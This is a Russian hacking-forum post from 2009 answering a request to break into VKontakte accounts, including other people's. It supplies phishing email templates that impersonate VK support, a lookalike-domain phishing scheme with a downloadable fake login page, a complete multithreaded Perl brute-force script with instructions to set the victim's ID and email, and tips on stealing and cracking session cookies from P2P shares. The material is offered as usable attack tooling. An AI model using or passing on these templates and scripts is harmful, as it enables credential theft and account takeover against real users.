Показать сообщение отдельно
Старый 06.03.2009, 00:42   #3
 
Статус: Ст.Лейтенант
Регистрация: 03.10.2008
Адрес: КМВ))•
Сообщений: 449
СПАСИБО: 316
сказали Спасибо 355 раз(а) в 196 сообщении
Получено наград:
По умолчанию ВКонтакте.ру

Цитата:
Сообщение от Электрошокер3000 Посмотреть сообщение
Уважаемые ! А как мне можно взломать свой (ну и если понадобится чужой) пароль сайта "В Контакте" ???

Некоторые способы взлома:

1) Email + СИ -> Пишем анонимное письмо, с указанием отправителя, к примеру "support@vkontakte.ru", "admin@vkontakte.ru", с текстом типа
"
Здравствуйте.
В связи с очень высоким количеством пользователей в нашей системе,
идёт проверка аккаунтов, и каждому пользователю отсылается такое письмо,
вам необходимо на него ответить в такой форме:

EM: Ваш email в vkontakte.ru.
PA: Ваш пароль в vkontakte.ru.
Пример:
EM: [Ссылки могут видеть только зарегистрированные пользователи. ]
PA: 123456

Чтоб не было путаницы, в теме письма укажите тему "Обновление".

Приносим извинения за неудобства.
".
Или типа этого, импровизируйте.
2) Фейк (обман), просто покупаете домен (к примеру, vkontaktte.ru) максимально похожий на vkontakte.ru, например разница в одной букве, и на него сливаете готовый фейк, его возьмете от сюда. vkontakte.zip [4.27 Kb]
[Ссылки могут видеть только зарегистрированные пользователи. ]
3) Email + фейк, Опять же пишем анонимное письмо, но на этот раз наша цель заманить пользователя на фейк, и чтоб он ввёл данные. Отправитель, к примеру "support@vkontakte.ru", "admin@vkontakte.ru", с текстом типа
"
Здравствуйте.
В связи с очень высоким количеством пользователей в нашей системе,
идёт проверка аккаунтов, и каждому пользователю отсылается такое письмо.
В течение недели вам нужно зайти в систему vkontaktte.ru, и вы будите автоматически занесены, а список активных.

Приносим извинения за неудобства.
".
Или типа этого, импровизируйте.
4) Использовать брутфорсы, ищите в поисковиках, вот например брутфорс на PERL.

Код:
Vkontakte.Ru Brute [FinaL]
Брутфорс акков вконтакте.ру
Сам скрипт брута (Perl):



#!/usr/bin/perl 

use IO::Socket; 
use MD5; 
use threads; 
use threads::shared; 
my @pass : shared; 

###################################### 
# C!klodoL 
# vkontakte.ru bruteforce with multi-threads 
###################################### 
$dic = 'passl.txt'; #словарь паролей 
$id = 111111; #id цели 
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40 
$threads = 4; #количество потоков 
###################################### 

open (pass, "<$dic"); 

Next: 
@pass = pass(); 

for(0..$threads) {$trl[$_] = threads->create(&Brut, $_);} 
for(@trl) { $_->join; } 

sub Brut 
{ 

while (@pass){ 

$pass = shift @pass; 

$md5 = MD5->hexhash($pass); 
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPor t=>80); 
print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n". 
"Host: vkontakte.ru\r\n". 
"Accept: */*\r\n". 
"Content-Type: application/x-www-form-urlencoded\r\n". 
"User-Agent: Mozillo\r\n". 
"Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n". 
"Connection: close\r\n\r\n"; 
$answ = <$sock>; 
close $sock; 
print "$pass $answ"; 
if ($answ =~ /302/){ 
open (good, '>>good.txt'); 
print good "$id:$pass:$md5\n"; 
print "$id:$pass:$md5\n"; 
close good; 
exit;} 
} 

} 

goto Next; 

sub pass 
{ 
my (@mas); 
while (<pass>){ 
push @mas, $_; 
last if (@mas == 400); 
} 
chomp @mas; 
return @mas; 
} 


--------------------------------------------------------------------------------



Цитата:

--------------------------------------------------------------------------------
$dic = 'passl.txt'; #словарь паролей
$id = 111111; #id цели
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков 
--------------------------------------------------------------------------------
Как запустить скрипт:

Цитата:

--------------------------------------------------------------------------------
1. Качаем прогу ActivePerl 5.10.0.1001 или более раннюю версию.
2. потом копируем текст в текстовый файл из кода выше... меняем id и мыло жертвы на нужное ,сохраняем как brut.txt
3. переименовываем файл из brute.txt в brute.pl
4. туда где лежит этот файл, копируем файл со словарём, обзывая его passl.txt
5. запускаем файл, и радуемся...
6. создастся good.txt, где и будет ваш пасс.

Vkontakte bruteforce ©serber



5) Искать уязвимости, тобишь активные XSS и SQl, для кражи кук используйте сниффер.
Источник: webxakep.net))•

6) Открываем в p2p любой популярный российский хаб, пишем в поиске “vkontakte”
и вуаля! получаем файлы с куками самых нерасторопных юзеров. И всё это было бы не так смешно,
если бы доблестные программисты вконтакте не догадались хранить в куках логин и пароль юзера.
Открываем файлик с куками:
remixemail - логин, где %40 это собачка
remixpass - md5 хэш пароля
Потом гуглим минуты две и находим сервис по расшифровке md5,
скармливаем ему хэш пароля, в 90% случаев получаем пароль!
Качаешь любую р2р прогу. Самые знаменитые - это (StrongDC++ имеется на этом форуме) и ApexDC++, а так их очень много. Далее идешь сюда - [Ссылки могут видеть только зарегистрированные пользователи. ] Выбираешь хаб любой который понравится и заходишь туда. Далее заходишь файл-настройки-шара, расшариваешь кое-что (гигов на 5-10 как минимум), так как на многих хабах запрещен поиск с маленькой шарой. Ну а дальше нажимаешь на поиск и ищешь что тебе надо.
Источник:forum.hackersoft.ru

Если до сих пор не поняли, не судьба Лучше мирно сидите там дальше вконтакте

С наилучшими пожеланиями))•


[Ссылки могут видеть только зарегистрированные пользователи. ]

Последний раз редактировалось Владимир_; 28.03.2009 в 18:42.
Владимир_ вне форума   ЦИТИРОВАТЬ